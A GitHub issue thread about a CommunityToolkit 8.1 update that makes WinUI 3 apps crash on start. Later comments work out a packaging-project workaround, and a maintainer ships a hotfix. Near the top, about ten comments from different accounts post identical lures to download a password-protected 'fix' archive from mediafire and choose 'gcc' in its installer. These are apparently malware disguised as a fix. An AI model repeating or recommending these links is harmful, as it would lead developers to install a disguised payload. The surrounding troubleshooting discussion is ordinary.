### ISSUE TITLE
Crash on start (EntryPointNotFoundException)

### ISSUE THREAD

**Issue by LucaCris** [CommunityToolkit/Windows#490]
### Describe the bug

WinUI 3 App, latest SDK version 1.5.6.

If I perform these updates (also a single one):

![Screenshot 2024-08-26 134333](https://github.com/user-attachments/assets/76544abb-cd15-41c9-8487-3fe29d9aaddc)

I'll get this, just after F5:

![Screenshot 2024-08-26 134245](https://github.com/user-attachments/assets/b357b5bc-75ff-4214-9fdb-918d490e6042)

Rollback updates and all restart to work perfectly.

### Steps to reproduce

```text
As descripted.
```

### Expected behavior

Run as before.

### Code Platform

- [ ] UWP
- [X] WinAppSDK / WinUI 3
- [ ] Web Assembly (WASM)
- [ ] Android
- [ ] iOS
- [ ] MacOS
- [ ] Linux / GTK

### Windows Build Number

- [ ] Windows 10 1809 (Build 17763)
- [ ] Windows 10 1903 (Build 18362)
- [ ] Windows 10 1909 (Build 18363)
- [ ] Windows 10 2004 (Build 19041)
- [ ] Windows 10 20H2 (Build 19042)
- [ ] Windows 10 21H1 (Build 19043)
- [ ] Windows 10 21H2 (Build 19044)
- [ ] Windows 10 22H2 (Build 19045)
- [ ] Windows 11 21H2 (Build 22000)
- [X] Other (specify)

### Other Windows Build number

net8.0-windows10.0.22621.0

### App minimum and target SDK version

- [ ] Windows 10, version 1809 (Build 17763)
- [ ] Windows 10, version 1903 (Build 18362)
- [ ] Windows 10, version 1909 (Build 18363)
- [ ] Windows 10, version 2004 (Build 19041)
- [ ] Windows 10, version 2104 (Build 20348)
- [ ] Windows 11, version 22H2 (Build 22000)
- [ ] Other (specify)

### Visual Studio Version

2022

### Visual Studio Build Number

17.11.1

### Device form factor

Desktop

### Help us help you

No, I'm unable to contribute a solution.

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TechHorizon2003** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by LucaCris** [comment]
Add these to the screenshot above:

CommunityToolkit.Mvvm 8.2.2
CommunityToolkit.WinUI.UI.Controls.DataGrid 7.1.2
CommunityToolkit.WinUI.UI.Controls.Markdown 7.1.2
Microsoft.Windows.SDK.BuildTools 10.0.26100.1
Microsoft.WindowsAppSDK 1.5.240802000

**Comment by LucaCris** [comment]
How to simply replicate:

- create new packaged App using wizard
- upgrade SDKs to latest
- _App will start normally_
- Add one CommunityToolkit 8.1, to have something like:

![Screenshot 2024-08-29 163814](https://github.com/user-attachments/assets/bc87fde8-d8da-46e8-b692-63ad5c719d6e)

The App will crash on start.

**Comment by Arlodotexe** [comment]
@LucaCris I was able to reproduce the issue with the "Black App, Packaged (WinUI 3 in Desktop)" project template, but only unpackaged, and regardless of whether the toolkit is installed.

Running packaged seems to work fine, unpackaged gives the error message you were seeing. Can you provide more information about your packaging setup?

**Comment by LucaCris** [comment]
Watch the screenshot: App8 (Package) + App8... all done by VS Wizard:

![Screenshot 2024-08-30 092607](https://github.com/user-attachments/assets/fa66a787-227d-48e2-ac01-cc1a627746bf)

**Comment by wbokkers** [comment]
I see the same issue on my project (with a separate package project).

**Comment by giraudremy** [comment]
Hi,

I have same issue, here a sample app.
[App7.zip](https://github.com/user-attachments/files/16841328/App7.zip)

I have change to target 22621 targetframework but not working for me.
<TargetFramework>net8.0-windows10.0.22621.0</TargetFramework>

Is there something missing in the projet ?

**Comment by lhak** [comment]
@giraudremy I looked at your sample project and found the issue, but I do not know how to fix it. The issue is that in the packaging project, the community toolkit nuget package shows a dependency on the winui2 Microsoft.ui.xaml package. This is not the case for the application project itself.

**Comment by LucaCris** [comment]
> @giraudremy I looked at your sample project and found the issue, but I do not know how to fix it. The issue is that in the packaging project, the community toolkit nuget package shows a dependency on the winui2 Microsoft.ui.xaml package. This is not the case for the application project itself.

The idea is to work like 8.0 does, on start...  😉

**Comment by giraudremy** [comment]
Hi,

I have added a PackageDependency to WindowsAppRuntime in Package.appxmanifest and now application start :
```
<Dependencies>
     <TargetDeviceFamily Name="Windows.Universal" MinVersion="10.0.22621.0" MaxVersionTested="10.0.22621.0" />
     <TargetDeviceFamily Name="Windows.Desktop" MinVersion="10.0.22621.0" MaxVersionTested="10.0.22621.0" />
     <PackageDependency** Name="Microsoft.WindowsAppRuntime.1.5" MinVersion="1.0.0.0" Publisher="CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US" />
  </Dependencies>

```

**Comment by lhak** [comment]
One possibility to workaround this issue is to add `<TargetPlatformIdentifier>windows</TargetPlatformIdentifier>` to the packaging project file. I guess the issue is that the packaging project sets this value to `UAP` by default and thus the UWP dependencies of the toolkit nuget package get added.

**Comment by MagnusJohansson** [comment]
I have the same issue.
- Create a simple blank WinUI3 from the VS templates (packaged or un-packaged, doesn't matter).
- Add the latest  CommunityToolkit.WinUI.Animations v.8.1.240821:
    `<PackageReference Include="CommunityToolkit.WinUI.Animations" Version="8.1.240821" />`
and the application crashes with:
```
An unhandled exception of type 'System.EntryPointNotFoundException' occurred in TestApp.dll
Unable to find an entry point named 'XamlCheckProcessRequirements' in DLL 'Microsoft.ui.xaml.dll'.
```
![image](https://github.com/user-attachments/assets/23c43519-10aa-4b06-b1fb-603b6abb940c)

Rolling back to the previous version of CommunityToolkit.WinUI.Animations 
`<PackageReference Include="CommunityToolkit.WinUI.Animations" Version="8.0.240109" />` 
fixes the problem.

The above suggestion regarding `<TargetPlatformIdentifier>windows</TargetPlatformIdentifier>` doesn't work.

**Comment by lhak** [comment]
@MagnusJohansson Do you have a repro project? I used the following steps and cannot reproduce this issue:

-Create a new packaged winui app in Visual Studio
-Add the animation nuget package
-Change the target framework to `<TargetFramework>net8.0-windows10.0.22621.0</TargetFramework>`

**Comment by MagnusJohansson** [comment]
@lhak Sorry, I misspoke, the problem only occurs when using a separate packaging project.
Here's a reproducible project:
The previous Nuget package (v8.0.240109 ) works fine:
https://github.com/MagnusJohansson/WinUI3PackagingProject/tree/feature/community-toolkit-v8.0.240109

The latest Nuget package (v8.1.240821) crashes:
https://github.com/MagnusJohansson/WinUI3PackagingProject/tree/feature/community-toolkit-v8.1.240821

**Comment by LucaCris** [comment]
> @MagnusJohansson Do you have a repro project? I used the following steps and cannot reproduce this issue:
> 
> -Create a new packaged winui app in Visual Studio -Add the animation nuget package -Change the target framework to `<TargetFramework>net8.0-windows10.0.22621.0</TargetFramework>`
> 
> Adding the `<TargetPlatformIdentifier>windows</TargetPlatformIdentifier>` property should only be necessary if a separate packaging project is used.

Wizard packaged project is enough to replicate, trust me...

**Comment by lhak** [comment]
@MagnusJohansson I can reproduce the crash, but can fix it by adding `<TargetPlatformIdentifier>windows</TargetPlatformIdentifier>`  below `    <TargetPlatformMinVersion>10.0.17763.0</TargetPlatformMinVersion>` in the packaging project file. I also changed TargetPlatformVersion to 10.0.22621.0 because I do not have the corresponding SDK installed, but I hope this does not make a difference.

**Comment by MagnusJohansson** [comment]
@lhak That seems to do the trick.
Thank you.

**Comment by LucaCris** [comment]
Trick not working nor on my main App neither on my wizard simple test...

**Comment by Arlodotexe** [comment]
> One possibility to workaround this issue is to add `<TargetPlatformIdentifier>windows</TargetPlatformIdentifier>` to the packaging project file. I guess the issue is that the packaging project sets this value to `UAP` by default and thus the UWP dependencies of the toolkit nuget package get added.

Thanks for your help @lhak! This workaround fixes the issue in my local repro, and I can confirm that building packages without the `uap` TFM included on the WinUI 3 head fixes the issue without adding `TargetPlatformIdentifier`. This was a packaging mistake and is something we can push a patch to fix.

**Comment by wbokkers** [comment]
@Arlodotexe @lhak The workaround using the <TargetPlatformIdentifier> might work, but unfortunately this breaks the packaging tools.
As soon a I choose 'Create App Packages' I get an error that the manifest is not valid.
My manifest also uses uap namespaces for protocol definitions, execution aliases, and the like. I'm not sure if this is related.

**Comment by MagnusJohansson** [comment]
Same packaging problem here.

Reproducible project:
https://github.com/MagnusJohansson/WinUI3PackagingProject/tree/feature/community-toolkit-v8.1.240821

Just select Publish->Create app Package and you get:
![image](https://github.com/user-attachments/assets/67ae0129-01fb-4c6b-8827-abaaac10e0bf)

**Comment by LucaCris** [comment]
It is now time to temporarily remove the update from nuget... 😑

**Comment by michael-hawker** [comment]
Ah, this is a regression of https://github.com/CommunityToolkit/Windows/issues/220; now that I see the PR, I understand! 😅

**Comment by michael-hawker** [comment]
Shipped a hotfix in v8.1.240916, just pushed to NuGet. Will be merged to main as well shortly.
